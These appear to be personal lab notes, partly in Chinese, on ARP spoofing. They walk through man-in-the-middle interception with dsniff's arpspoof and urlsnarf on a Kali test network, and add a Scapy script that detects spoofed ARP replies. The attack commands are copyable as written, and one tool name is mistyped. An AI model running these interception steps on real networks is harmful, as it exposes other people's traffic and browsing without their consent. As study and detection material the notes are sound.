Start by running sudo -i  to become a root user.

升级一下包管理器：apt-get update

安装：apt-get install dsniff

The dsniff  tool contains several useful tools for intercepting network traffic, such as arpspoof
, a tool that executes an ARP spoofing attack.

netdiscover

It issues ARP queries for all possible IP addresses on the subnetwork, and when a machine on the network responds, it records and displays the machine’s MAC address and IP address.

netdiscovery -r 10.10.10.0/24

一旦找到，CTRL+C中断

接下来，让Kali能够转发包

enable IP forwarding by setting the IP forwarding flag:

echo 1 > /proc/sys/net/ipv4/ip_forward

 generate multiple fake ARP replies by running the following command:

arpspoof -i eth0 -t <VICTIM_IP>  <ROUTER_IP>

 -t  flag specifies the target

 -i  flag represents the interface.

0806 is a type field indicating that an ARP packet is contained within the Ethernet frame being transmitted.

42  represents the total number of bytes associated with the Ethernet frame.

also trick the router into believing you’re the victim so that you can intercept incoming internet traffic on the victim’s behalf.

arpspoof -i eth0 -t <ROUTER_IP> <VICTIM_IP>

Extract the URLs by running the following command in a new terminal:（截取eth0的URL包）

kali@kali:~$ sudo urlsnarf -i eth0

检测ARP欺骗攻击：（先安装包）

sudo apt install python3-pip

pip3 install --pre scapy[basic]

后台运行mousepad：mousepad &

from scapy.all import sniff

IP_MAC_MAP = {}


def processPacket(packet):
    src_IP = packet['ARP'].psrc
    src_MAC = packet['Ether'].src
    if src_MAC in IP_MAC_MAP.keys():
        if IP_MAC_MAP[src_MAC] != src_IP:
            try:
                old_IP = IP_MAC_MAP[src_MAC]
            except:
                old_IP = "unknown"
            message = str(old_IP) + "is pretending to " + str(src_IP)
            return message
    else:
        IP_MAC_MAP[src_MAC] = src_IP


sniff(count=0, filter="arp", store=0, prn=processPacket)

我的探索代码，启动监听ARP协议包

from scapy.all import *

def handelPacket(p):
    # src_IP = p['ARP'].psrc
    # src_MAC = p['Ethernet'].src
    # message=str(src_IP)+"  : "+str(src_MAC)
    # return message
    p.show()


sniff(prn=handelPacket, filter="arp", count=0)

linux开启arp伪造攻击：

sudo arpspoof -i eth0 -t 10.10.10.5 10.10.10.1

结果：

###[ Ethernet ]### 
  dst       = 08:00:27:49:84:59
  src       = 08:00:27:a6:1f:86
  type      = ARP
###[ ARP ]### 
     hwtype    = 0x1
     ptype     = IPv4
     hwlen     = 6
     plen      = 4
     op        = who-has
     hwsrc     = 08:00:27:a6:1f:86
     psrc      = 10.10.10.7
     hwdst     = 00:00:00:00:00:00
     pdst      = 10.10.10.3

###[ Ethernet ]### 
  dst       = 08:00:27:a6:1f:86
  src       = 08:00:27:49:84:59
  type      = ARP
###[ ARP ]### 
     hwtype    = 0x1
     ptype     = IPv4
     hwlen     = 6
     plen      = 4
     op        = is-at
     hwsrc     = 08:00:27:49:84:59
     psrc      = 10.10.10.3
     hwdst     = 08:00:27:a6:1f:86
     pdst      = 10.10.10.7
###[ Padding ]### 
        load      = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'